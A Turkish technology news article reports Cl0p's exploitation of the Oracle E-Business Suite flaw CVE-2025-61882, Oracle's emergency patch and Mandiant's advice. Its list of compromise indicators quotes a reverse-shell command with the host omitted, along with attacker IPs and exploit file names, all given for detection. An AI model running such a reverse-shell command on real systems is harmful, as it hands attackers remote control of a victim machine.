Sonuç bulunamadı
Bütün Sonuçları Göster
Teknoloji tutkunu Technopatların ortak adresi: Technopat.net
  • Haber
  • Yapay Zeka
  • Tavsiyeler
  • Oyun
  • Video
  • Teknoloji
    • Mobil
    • Yazılım
    • Elektronik Alışveriş Fırsatları
    • Pratik
    • Ev Teknolojileri
    • Makale
    • Güvenlik
    • Ekonomi
    • İnternet
    • Giyilebilir Teknoloji
    • Sağlık
    • Yazıcı
    • Sosyal Medya
    • Otomobil
      • Elektrikli Otomobil
  • Sosyal
Teknoloji tutkunu Technopatların ortak adresi: Technopat.net
  • Haber
  • Yapay Zeka
  • Tavsiyeler
  • Oyun
  • Video
  • Teknoloji
    • Mobil
    • Yazılım
    • Elektronik Alışveriş Fırsatları
    • Pratik
    • Ev Teknolojileri
    • Makale
    • Güvenlik
    • Ekonomi
    • İnternet
    • Giyilebilir Teknoloji
    • Sağlık
    • Yazıcı
    • Sosyal Medya
    • Otomobil
      • Elektrikli Otomobil
  • Sosyal
Sonuç bulunamadı
Bütün Sonuçları Göster
Teknoloji tutkunu Technopatların ortak adresi: Technopat.net

Anasayfa - Güvenlik - Cl0p hacker grubu Oracle E-Business Suite’i vurdu!

Cl0p hacker grubu Oracle E-Business Suite’i vurdu!

6 Ekim 2025 - 17:00
- Güvenlik, Haber, Teknoloji

Oracle, E-Business Suite’inde tespit edilen ve Cl0p siber suç grubu tarafından veri hırsızlığı saldırılarında aktif olarak kullanılan kritik güvenlik açığı için acil güncelleme yayınladı. CVE-2025-61882 kodu ile takip edilen bu açık, şirketlerin hassas verilerini ciddi risk altına sokuyor.

Kritik güvenlik açığının detayları

CVE-2025-61882 güvenlik açığı, 9.8 CVSS puanıyla kritik seviyede değerlendiriliyor. Açık, Oracle Concurrent Processing bileşeninde bulunuyor ve kimlik doğrulaması yapılmamış bir saldırganın HTTP üzerinden ağ erişimi ile sistemi ele geçirmesine olanak tanıyor.

Oracle’ın yayınladığı güvenlik bülteninde, “Bu güvenlik açığı kimlik doğrulaması olmadan uzaktan istismar edilebilir, yani kullanıcı adı ve şifreye ihtiyaç olmadan ağ üzerinden kullanılabilir. Başarıyla istismar edilirse, bu güvenlik açığı uzaktan kod yürütme ile sonuçlanabilir” açıklaması yer alıyor. Oracle’ın Güvenlik Müdürü Rob Duhart, ayrı bir uyarıda şirketin CVE-2025-61882 için yamalar yayınladığını ve “soruşturmamız sırasında keşfedilen ek potansiyel istismar olasılıklarına karşı güncellemeler sağladıklarını” belirtti.

Saldırı indikatörleri ve Scattered LAPSUS$ Hunters bağlantısı

Oracle, tehlike göstergeleri (IoC) olarak aşağıdaki IP adreslerini ve artefaktları paylaştı. Bu göstergeler, saldırılarda Scattered LAPSUS$ Hunters grubunun da muhtemel katılımına işaret ediyor:

  • 200.107.207[.]26 (Potansiyel GET ve POST aktivitesi)
  • 185.181.60[.]11 (Potansiyel GET ve POST aktivitesi)
  • sh -c /bin/bash -i >& /dev/tcp// 0>&1 (Belirli bir port üzerinden giden TCP bağlantısı kurma)
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Bu dosya isimleri ve komutlar, saldırganların sisteme sızmak ve kontrol sağlamak için kullandıkları araçları gösteriyor.

Oracle zero-day haberi, Cl0p ransomware grubunun Oracle E-Business Suite’i hedef alan yeni kampanyasına ilişkin raporların ortaya çıkmasından günler sonra geldi. Google’a ait Mandiant, devam eden aktiviteyi yüzlerce ele geçirilmiş hesaptan başlatılan “yüksek hacimli e-posta kampanyası” olarak tanımladı.

Google Cloud’da Mandiant CTO’su Charles Carmakal, LinkedIn’de paylaştığı gönderide şu açıklamalarda bulundu: “Cl0p, Oracle EBS’de birçok zafiyet sömürdü ve bu sayede Ağustos 2025’te birkaç kurbandan büyük miktarda veri çaldı. Oracle’ın Temmuz 2025 güncellemesinde yamalanan zafiyetlerin yanı sıra bu hafta sonu yamalanan CVE-2025-61882 dahil olmak üzere birden fazla zafiyet kullanıldı.”

Carmakal’ın uyarısı oldukça net: “Halihazırda gerçekleşmiş olan geniş çaplı zero-day istismarını (ve diğer aktörler tarafından muhtemelen devam edecek n-day istismarını) göz önünde bulundurarak, yamanın ne zaman uygulandığına bakılmaksızın, kuruluşlar zaten ele geçirilip geçirilmediklerini incelemelidir.” Bu uyarı, sadece güncelleme yapmanın yeterli olmadığını, kurumların geçmişe dönük olarak sistemlerini kontrol etmeleri gerektiğini vurguluyor. Saldırganlar, açığın yamalanmasından önce sistemlere sızmış ve kalıcı erişim sağlamış olabilir.

Raporlara göre, saldırı kampanyası yüksek hacimli ve koordineli bir şekilde yürütülüyor. Yüzlerce ele geçirilmiş hesabın kullanılması, saldırganların geniş bir ağa sahip olduğunu ve birçok kurumu aynı anda hedefleyebildiğini gösteriyor. Oracle E-Business Suite’in kurumsal dünyada yaygın kullanımı düşünüldüğünde, potansiyel etki alanı oldukça geniş.

Cl0p grubu, geçmişte de büyük ölçekli veri hırsızlığı kampanyalarıyla tanınıyor. Grubun bu yeni kampanyada hem eski hem de yeni güvenlik açıklarını birleştirerek kullanması, saldırı stratejilerinin geliştiğini gösteriyor.

Oracle’ın acil yamasını derhal uygulamak kritik önem taşıyor. Ancak Mandiant uzmanlarının da belirttiği gibi, yamayı uygulamak tek başına yeterli değil. Kurumların ayrıca:

  • Sistem loglarını geriye dönük olarak incelemesi
  • Paylaşılan IoC’leri kullanarak tehdit avı yapması
  • Ağ trafiğinde anormal aktiviteleri kontrol etmesi
  • E-Business Suite erişim kontrollerini gözden geçirmesi gerekiyor

Bu olay, kurumsal güvenlikte proaktif yaklaşımın ve sürekli izlemenin önemini bir kez daha ortaya koyuyor. Zero-day açıkların hızla weaponize edildiği günümüzde, güvenlik yamalarının zamanında uygulanması ve sistem güvenliğinin sürekli izlenmesi hayati önem taşıyor.

Etiketler: cl0pCVE-2025-61882Oracle
PaylaşPaylaşTweetYollaPaylaş
Berkan Aslan

Berkan Aslan

Yorum Yap Yanıtı iptal et

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

RSS Technopat Sosyal

  • Din kültürü öğretmeninin dersleri öğrencilere işletmesi normal midir?
  • 1500 TL'ye oyuncu kulaklığı tavsiyesi
  • Zorin OS'da NVIDIA sürücüleri kurulurken siyah ekran veriyor
  • HP Victus 16 Hall sensör için ne yapılmalı?
  • Euro Truck Simulator 2 1.56 güncellemesinden sonra sürekli oyundan atıyor
  • Roblox'da ucuza Robux nasıl alınır?
  • Antrenman kaç gün olmalı?
  • Format sonrası internet yavaşladı
  • Arama çubuğu sonuç vermiyor
  • İyon sherrif alınır mı?

Technopat Video

Şu an oynayan

Bu canavarlar her şeyi yapıyor! Çantada süper bilgisayar devri başladı

Bu canavarlar her şeyi yapıyor! Çantada süper bilgisayar devri başladı

Bu canavarlar her şeyi yapıyor! Çantada süper bilgisayar devri başladı

Ekran Kartı
Kandırmıyor, şaşırtıyor! Xiaomi 15T incelemesi

Kandırmıyor, şaşırtıyor! Xiaomi 15T incelemesi

Akıllı Telefon
Dreame Z30 kablosuz dikey süpürge incelemesi

Dreame Z30 kablosuz dikey süpürge incelemesi

Ev Teknolojileri

Teknoloji tutkunu Technopatların ortak adresi: Technopat.net!

Güncel teknoloji, internet, donanım, yazılım, oyun ve daha fazlası haber, makale ve videolar ile Technopat’ta sizlerle.


01010100 01100101 01100011 01101000 01101110 01101111 01110000 01100001 01110100

Kategoriler

  • Yapay Zeka
  • Ev Teknolojileri
  • Makale
  • Video

Sosyal Medya

Bağlantılar

  • Hakkında
  • Haber
  • Video
  • Sosyal
  • Çerez Politikası
© 2011-2025 Technopat. Tüm Hakları Saklıdır.
Netse
Çerez Onayı
Web sitemizi ziyaret ettiğinizde, kullanıcı deneyiminizi daha iyi hale getirmek, hizmetlerimizi size daha etkin bir şekilde sunabilmek için çerezler (cookies) ve benzeri araçlar kullanıyoruz. Çerezler, internet sitesinin düzgün çalışmasını sağlamak, içeriği kişiselleştirmek, sosyal medya özellikleri sağlamak ve trafik analizi yapmak için kullanılan küçük metin dosyalarıdır. Çerezleri nasıl kullandığımız ve kişisel verilerinizi nasıl işlediğimiz hakkında daha fazla bilgi almak için çerez politikamızı ve kişisel veri politikamızı inceleyebilirsiniz.
Fonksiyonel Her zaman aktif
Teknik depolama veya erişim, sadece kullanıcının açıkça talep ettiği belirli bir hizmetin kullanılmasını sağlama amacıyla veya iletişimin elektronik iletişim ağı üzerinden iletilmesinin tek amacıyla yasal olarak kesinlikle gereklidir.
Tercihler
Teknik depolama veya erişim, abone veya kullanıcı tarafından istenmeyen tercihlerin depolanması yasal amacıyla gereklidir.
İstatistikler
Sadece istatistiksel amaçlarla kullanılan teknik depolama veya erişim. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
Pazarlama
Teknik depolama veya erişim, reklam gönderimi için kullanıcı profilleri oluşturmak veya kullanıcıyı bir web sitesinde veya birden fazla web sitesinde benzer pazarlama amaçları için takip etmek amacıyla gereklidir.
Seçenekleri yönet Hizmetleri yönetin {vendor_count} satıcılarını yönetin Bu amaçlar hakkında daha fazla bilgi edinin
Tercihleri yönet
{title} {title} {title}
Onayı Yönet
En iyi deneyimleri sunmak için, cihaz bilgilerini saklamak ve/veya bunlara erişmek amacıyla çerezler gibi teknolojiler kullanıyoruz. Bu teknolojilere izin vermek, bu sitedeki tarama davranışı veya benzersiz kimlikler gibi verileri işlememize izin verecektir. Onay vermemek veya onayı geri çekmek, belirli özellikleri ve işlevleri olumsuz etkileyebilir.
Fonksiyonel Her zaman aktif
Teknik depolama veya erişim, abone veya kullanıcı tarafından açıkça talep edilen belirli bir hizmetin kullanılmasını sağlamak veya bir elektronik iletişim ağı üzerinden bir iletişimin iletimini gerçekleştirmek amacıyla meşru bir amaç için kesinlikle gereklidir.
Tercihler
Teknik depolama veya erişim, abone veya kullanıcı tarafından talep edilmeyen tercihlerin saklanmasının meşru amacı için gereklidir.
İstatistik
Sadece istatistiksel amaçlar için kullanılan teknik depolama veya erişim. Sadece anonim istatistiksel amaçlar için kullanılan teknik depolama veya erişim. Mahkeme celbi, İnternet Hizmet Sağlayıcınızın gönüllü uyumu veya üçüncü bir taraftan ek kayıtlar olmadan, yalnızca bu amaçla depolanan veya alınan bilgiler genellikle kimliğinizi belirlemek için kullanılamaz.
Pazarlama
Teknik depolama veya erişim, reklam göndermek için kullanıcı profilleri oluşturmak veya benzer pazarlama amaçları için kullanıcıyı bir web sitesinde veya birkaç web sitesinde izlemek için gereklidir.
Seçenekleri yönet Hizmetleri yönetin {vendor_count} satıcılarını yönetin Bu amaçlar hakkında daha fazla bilgi edinin
Tercihleri görüntüle
{title} {title} {title}
Sonuç bulunamadı
Bütün Sonuçları Göster
  • Giriş
  • Teknoloji Haberleri
  • Sosyal
  • Video
  • Tavsiyeler
  • İncelemeler
    • Video İncelemeler
  • Güvenlik
  • Oyun
  • Makale
    • Pratik
    • Yazar Köşeleri

© 2025 Technopat
Sorularınız için Technopat Sosyal